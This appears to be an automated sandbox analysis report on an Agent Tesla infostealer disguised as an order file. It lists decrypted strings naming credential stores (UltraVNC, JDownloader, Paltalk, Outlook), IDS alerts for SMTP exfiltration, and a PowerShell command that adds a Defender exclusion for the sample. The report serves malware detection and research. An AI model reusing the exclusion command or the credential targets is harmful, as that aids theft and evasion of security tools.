Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles(x86)
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd2
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd2
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd2
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles(x86)
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: UltraVNC
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: ProgramFiles(x86)
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: passwd2
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: JDownloader 2.0
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: JDownloader 2.0\cfg
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: JDownloader 2.0\cfg
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Paltalk
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
Source: 5.2.ORDER#023_2024.exe.400000.0.unpack | String decryptor: nickname
Source: ORDER#023_2024.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORDER#023_2024.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 4x nop then jmp 06F58DEFh | 0_2_06F583B4
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 4x nop then jmp 06F58DEFh | 0_2_06F586B6
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 4x nop then jmp 06F58DEFh | 0_2_06F584EE
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 4x nop then jmp 06F58DEFh | 0_2_06F58579

                        Networking

Source: Network traffic | Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49734 -> 199.79.62.115:587
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49734 -> 199.79.62.115:587
Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49734 -> 199.79.62.115:587
Source: Network traffic | Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:49734 -> 199.79.62.115:587
Source: Network traffic | Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49734 -> 199.79.62.115:587
Source: global traffic | TCP traffic: 192.168.2.4:49734 -> 199.79.62.115:587
Source: Joe Sandbox View | IP Address: 199.79.62.115
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mail.mbarieservicesltd.com
Source: ORDER#023_2024.exe | String found in binary or memory: http://localhost/arkanoid_server/requests.php
Source: ORDER#023_2024.exe, 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.mbarieservicesltd.com
Source: ORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

                        System Summary

Source: initial sample | Static PE information: Filename: ORDER#023_2024.exe
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_02A3DF14
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F548D8
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F55628
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F535B0
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F5A188
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F53E20
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F55FD8
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F55FCB
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 0_2_06F539E8
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_014C4140
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_014C4D58
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_014C4488
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067F8F68
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067FF590
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067F2B58
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067FA890
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067FE1BB
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067F869B
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_067F5C31
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_06841CB0
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Code function: 5_2_06843908
Source: ORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000002.1689046037.00000000053D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000002.1692813648.00000000076F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000002.1678208666.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000002.1681703639.0000000003B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000000.00000000.1651295321.0000000000762000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJmYB.exe0 vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000005.00000002.2903371766.000000000042C000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe, 00000005.00000002.2903789840.00000000010F8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe | Binary or memory string: OriginalFilenameJmYB.exe0 vs ORDER#023_2024.exe
Source: ORDER#023_2024.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORDER#023_2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, O.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, O.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, P.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, N.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, g58dCb1xNyIgM5il43.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.cs | Security API names: _0020.SetAccessControl
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.cs | Security API names: _0020.AddAccessRule
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.cs | Security API names: _0020.SetAccessControl
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.cs | Security API names: _0020.AddAccessRule
Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, g58dCb1xNyIgM5il43.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/6@3/1
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER#023_2024.exe.log
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ma5vwock.gkh.ps1
Source: ORDER#023_2024.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ORDER#023_2024.exe | ReversingLabs: Detection: 65%
Source: unknown | Process created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Process created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Process created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: ORDER#023_2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
